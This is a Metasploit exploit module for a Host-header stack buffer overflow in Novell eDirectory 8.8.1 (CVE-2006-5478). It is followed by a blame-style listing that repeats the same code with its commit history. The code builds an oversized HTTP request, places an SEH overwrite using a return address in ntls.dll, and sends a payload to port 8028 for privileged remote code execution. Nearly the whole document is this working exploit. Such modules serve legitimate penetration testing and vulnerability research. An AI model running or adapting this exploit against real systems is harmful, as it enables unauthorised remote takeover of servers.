metasploit-framework/modules/exploits/windows/http/edirectory_host.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell eDirectory NDS Server Host Header Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.
        The web interface does not validate the length of the
        HTTP Host header prior to using the value of that header in an
        HTTP redirect.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-5478'],
          ['OSVDB', '29993'],
          ['BID', '20655'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Oct 21 2006',
      'DefaultTarget' => 0))

    register_options([Opt::RPORT(8028)], self.class)
  end

  def exploit
    connect

    sploit =  "GET /nds HTTP/1.1" + "\r\n"
    sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
    sploit << "," + rand_text_alphanumeric(719, payload_badchars)
    seh    = generate_seh_payload(target.ret)
    sploit[705, seh.length] = seh
    sploit << "\r\n\r\n"

    print_status("Trying target #{target.name}...")

    sock.put(sploit)

    handler
    disconnect
  end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = GreatRanking`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Novell eDirectory NDS Server Host Header Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.`
			`The web interface does not validate the length of the`
			`HTTP Host header prior to using the value of that header in an`
			`HTTP redirect.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2006-5478'],`
			`['OSVDB', '29993'],`
			`['BID', '20655'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 600,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll`
			`],`
			`'Privileged' => true,`
			`'DisclosureDate' => 'Oct 21 2006',`
			`'DefaultTarget' => 0))`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options([Opt::RPORT(8028)], self.class)`
			`end`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit = "GET /nds HTTP/1.1" + "\r\n"`
			`sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)`
			`sploit << "," + rand_text_alphanumeric(719, payload_badchars)`
			`seh = generate_seh_payload(target.ret)`
			`sploit[705, seh.length] = seh`
			`sploit << "\r\n\r\n"`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Trying target #{target.name}...")`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sock.put(sploit)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`disconnect`
			`end`
added exploit module edirectory_host.rb git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-27 14:25:42 +00:00
OSVDB references updates from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6812 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-16 16:02:24 +00:00			`end`